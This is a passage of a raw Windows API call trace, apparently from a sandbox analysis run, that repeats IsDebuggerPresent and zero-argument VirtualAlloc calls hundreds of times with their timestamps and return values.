IsDebuggerPresent () returned 0 [0057.176] IsDebuggerPresent () returned 0 [0057.176] IsDebuggerPresent () returned 0 [0057.176] IsDebuggerPresent () returned 0 [0057.176] IsDebuggerPresent () returned 0 [0057.176] IsDebuggerPresent () returned 0 [0057.176] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.176] IsDebuggerPresent () returned 0 [0057.176] IsDebuggerPresent () returned 0 [0057.176] IsDebuggerPresent () returned 0 [0057.176] IsDebuggerPresent () returned 0 [0057.176] IsDebuggerPresent () returned 0 [0057.176] IsDebuggerPresent () returned 0 [0057.176] IsDebuggerPresent () returned 0 [0057.176] IsDebuggerPresent () returned 0 [0057.176] IsDebuggerPresent () returned 0 [0057.176] IsDebuggerPresent () returned 0 [0057.176] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.176] IsDebuggerPresent () returned 0 [0057.176] IsDebuggerPresent () returned 0 [0057.176] IsDebuggerPresent () returned 0 [0057.176] IsDebuggerPresent () returned 0 [0057.176] IsDebuggerPresent () returned 0 [0057.176] IsDebuggerPresent () returned 0 [0057.177] IsDebuggerPresent () returned 0 [0057.177] IsDebuggerPresent () returned 0 [0057.177] IsDebuggerPresent () returned 0 [0057.177] IsDebuggerPresent () returned 0 [0057.177] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.177] IsDebuggerPresent () returned 0 [0057.177] IsDebuggerPresent () returned 0 [0057.177] IsDebuggerPresent () returned 0 [0057.177] IsDebuggerPresent () returned 0 [0057.177] IsDebuggerPresent () returned 0 [0057.177] IsDebuggerPresent () returned 0 [0057.177] IsDebuggerPresent () returned 0 [0057.177] IsDebuggerPresent () returned 0 [0057.177] IsDebuggerPresent () returned 0 [0057.177] IsDebuggerPresent () returned 0 [0057.177] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.177] IsDebuggerPresent () returned 0 [0057.177] IsDebuggerPresent () returned 0 [0057.177] IsDebuggerPresent () returned 0 [0057.177] IsDebuggerPresent () returned 0 [0057.177] IsDebuggerPresent () returned 0 [0057.177] IsDebuggerPresent () returned 0 [0057.177] IsDebuggerPresent () returned 0 [0057.177] IsDebuggerPresent () returned 0 [0057.177] IsDebuggerPresent () returned 0 [0057.177] IsDebuggerPresent () returned 0 [0057.177] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.177] IsDebuggerPresent () returned 0 [0057.177] IsDebuggerPresent () returned 0 [0057.177] IsDebuggerPresent () returned 0 [0057.177] IsDebuggerPresent () returned 0 [0057.177] IsDebuggerPresent () returned 0 [0057.177] IsDebuggerPresent () returned 0 [0057.177] IsDebuggerPresent () returned 0 [0057.177] IsDebuggerPresent () returned 0 [0057.177] IsDebuggerPresent () returned 0 [0057.177] IsDebuggerPresent () returned 0 [0057.178] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.178] IsDebuggerPresent () returned 0 [0057.178] IsDebuggerPresent () returned 0 [0057.178] IsDebuggerPresent () returned 0 [0057.178] IsDebuggerPresent () returned 0 [0057.178] IsDebuggerPresent () returned 0 [0057.178] IsDebuggerPresent () returned 0 [0057.178] IsDebuggerPresent () returned 0 [0057.178] IsDebuggerPresent () returned 0 [0057.178] IsDebuggerPresent () returned 0 [0057.178] IsDebuggerPresent () returned 0 [0057.178] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.178] IsDebuggerPresent () returned 0 [0057.178] IsDebuggerPresent () returned 0 [0057.178] IsDebuggerPresent () returned 0 [0057.178] IsDebuggerPresent () returned 0 [0057.178] IsDebuggerPresent () returned 0 [0057.178] IsDebuggerPresent () returned 0 [0057.178] IsDebuggerPresent () returned 0 [0057.178] IsDebuggerPresent () returned 0 [0057.178] IsDebuggerPresent () returned 0 [0057.178] IsDebuggerPresent () returned 0 [0057.178] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.178] IsDebuggerPresent () returned 0 [0057.178] IsDebuggerPresent () returned 0 [0057.178] IsDebuggerPresent () returned 0 [0057.178] IsDebuggerPresent () returned 0 [0057.178] IsDebuggerPresent () returned 0 [0057.178] IsDebuggerPresent () returned 0 [0057.178] IsDebuggerPresent () returned 0 [0057.178] IsDebuggerPresent () returned 0 [0057.178] IsDebuggerPresent () returned 0 [0057.178] IsDebuggerPresent () returned 0 [0057.178] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.178] IsDebuggerPresent () returned 0 [0057.178] IsDebuggerPresent () returned 0 [0057.179] IsDebuggerPresent () returned 0 [0057.179] IsDebuggerPresent () returned 0 [0057.179] IsDebuggerPresent () returned 0 [0057.179] IsDebuggerPresent () returned 0 [0057.179] IsDebuggerPresent () returned 0 [0057.179] IsDebuggerPresent () returned 0 [0057.179] IsDebuggerPresent () returned 0 [0057.179] IsDebuggerPresent () returned 0 [0057.179] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.179] IsDebuggerPresent () returned 0 [0057.179] IsDebuggerPresent () returned 0 [0057.179] IsDebuggerPresent () returned 0 [0057.179] IsDebuggerPresent () returned 0 [0057.179] IsDebuggerPresent () returned 0 [0057.179] IsDebuggerPresent () returned 0 [0057.179] IsDebuggerPresent () returned 0 [0057.179] IsDebuggerPresent () returned 0 [0057.179] IsDebuggerPresent () returned 0 [0057.179] IsDebuggerPresent () returned 0 [0057.179] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.179] IsDebuggerPresent () returned 0 [0057.179] IsDebuggerPresent () returned 0 [0057.179] IsDebuggerPresent () returned 0 [0057.179] IsDebuggerPresent () returned 0 [0057.179] IsDebuggerPresent () returned 0 [0057.179] IsDebuggerPresent () returned 0 [0057.179] IsDebuggerPresent () returned 0 [0057.179] IsDebuggerPresent () returned 0 [0057.179] IsDebuggerPresent () returned 0 [0057.179] IsDebuggerPresent () returned 0 [0057.179] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.179] IsDebuggerPresent () returned 0 [0057.179] IsDebuggerPresent () returned 0 [0057.179] IsDebuggerPresent () returned 0 [0057.179] IsDebuggerPresent () returned 0 [0057.179] IsDebuggerPresent () returned 0 [0057.180] IsDebuggerPresent () returned 0 [0057.180] IsDebuggerPresent () returned 0 [0057.180] IsDebuggerPresent () returned 0 [0057.180] IsDebuggerPresent () returned 0 [0057.180] IsDebuggerPresent () returned 0 [0057.180] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.180] IsDebuggerPresent () returned 0 [0057.180] IsDebuggerPresent () returned 0 [0057.180] IsDebuggerPresent () returned 0 [0057.180] IsDebuggerPresent () returned 0 [0057.180] IsDebuggerPresent () returned 0 [0057.180] IsDebuggerPresent () returned 0 [0057.180] IsDebuggerPresent () returned 0 [0057.180] IsDebuggerPresent () returned 0 [0057.180] IsDebuggerPresent () returned 0 [0057.180] IsDebuggerPresent () returned 0 [0057.180] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.180] IsDebuggerPresent () returned 0 [0057.180] IsDebuggerPresent () returned 0 [0057.180] IsDebuggerPresent () returned 0 [0057.180] IsDebuggerPresent () returned 0 [0057.180] IsDebuggerPresent () returned 0 [0057.180] IsDebuggerPresent () returned 0 [0057.180] IsDebuggerPresent () returned 0 [0057.180] IsDebuggerPresent () returned 0 [0057.180] IsDebuggerPresent () returned 0 [0057.180] IsDebuggerPresent () returned 0 [0057.180] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.180] IsDebuggerPresent () returned 0 [0057.180] IsDebuggerPresent () returned 0 [0057.180] IsDebuggerPresent () returned 0 [0057.180] IsDebuggerPresent () returned 0 [0057.180] IsDebuggerPresent () returned 0 [0057.180] IsDebuggerPresent () returned 0 [0057.180] IsDebuggerPresent () returned 0 [0057.180] IsDebuggerPresent () returned 0 [0057.181] IsDebuggerPresent () returned 0 [0057.181] IsDebuggerPresent () returned 0 [0057.181] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.181] IsDebuggerPresent () returned 0 [0057.181] IsDebuggerPresent () returned 0 [0057.181] IsDebuggerPresent () returned 0 [0057.181] IsDebuggerPresent () returned 0 [0057.181] IsDebuggerPresent () returned 0 [0057.181] IsDebuggerPresent () returned 0 [0057.181] IsDebuggerPresent () returned 0 [0057.181] IsDebuggerPresent () returned 0 [0057.181] IsDebuggerPresent () returned 0 [0057.181] IsDebuggerPresent () returned 0 [0057.181] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.181] IsDebuggerPresent () returned 0 [0057.181] IsDebuggerPresent () returned 0 [0057.181] IsDebuggerPresent () returned 0 [0057.181] IsDebuggerPresent () returned 0 [0057.181] IsDebuggerPresent () returned 0 [0057.181] IsDebuggerPresent () returned 0 [0057.181] IsDebuggerPresent () returned 0 [0057.181] IsDebuggerPresent () returned 0 [0057.181] IsDebuggerPresent () returned 0 [0057.181] IsDebuggerPresent () returned 0 [0057.181] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.181] IsDebuggerPresent () returned 0 [0057.181] IsDebuggerPresent () returned 0 [0057.181] IsDebuggerPresent () returned 0 [0057.181] IsDebuggerPresent () returned 0 [0057.181] IsDebuggerPresent () returned 0 [0057.181] IsDebuggerPresent () returned 0 [0057.181] IsDebuggerPresent () returned 0 [0057.181] IsDebuggerPresent () returned 0 [0057.181] IsDebuggerPresent () returned 0 [0057.181] IsDebuggerPresent () returned 0 [0057.181] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.182] IsDebuggerPresent () returned 0 [0057.182] IsDebuggerPresent () returned 0 [0057.182] IsDebuggerPresent () returned 0 [0057.182] IsDebuggerPresent () returned 0 [0057.182] IsDebuggerPresent () returned 0 [0057.182] IsDebuggerPresent () returned 0 [0057.182] IsDebuggerPresent () returned 0 [0057.182] IsDebuggerPresent () returned 0 [0057.182] IsDebuggerPresent () returned 0 [0057.182] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.182] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.182] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.182] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.182] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.182] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.182] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.182] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.183] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.183] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.183] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.183] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.183] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.183] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.183] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.183] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.183] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.183] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.183] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.183] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.183] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.183] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.183] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.183] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.183] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.183] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.183] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.183] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.183] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.183] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.184] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.184] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.184] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.184] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.184] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.184] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.184] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.184] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.184] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.184] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.184] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.184] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.184] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.184] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.184] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.184] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.184] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.184] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.184] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.184] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.184] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.184] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.185] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.185] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.185] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.185] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.185] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.185] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.185] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.185] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.185] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.185] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.185] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.185] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.185] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.185] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.185] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.185] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.185] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.185] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.185] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.185] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.185] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.185] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.186] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.186] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.186] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.186] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.186] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.186] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.186] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.186] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.186] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.186] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.186] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.186] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.186] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.186] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.186] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.186] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.186] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.186] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.186] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.186] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.186] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.187] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.187] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.187] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.187] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.187] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.187] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.187] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.187] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.187] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.187] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.187] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.187] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.187] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.187] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.187] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.187] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.187] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.187] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.187] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.187] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.187] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.187] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.188] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.188] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.188] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.188] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.188] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.188] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.188] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.188] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.188] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.188] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.188] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.188] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.188] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.188] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.188] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.188] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.188] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.188] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.188] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.188] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.188] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.188] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.189] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.189] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.189] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.189] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.189] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.189] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.189] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.189] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.189] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.189] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.189] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.189] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.189] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.189] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.189] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.189] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.189] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0057.189] VirtualAlloc (lpAddress=0x0, dwSize=0x0, 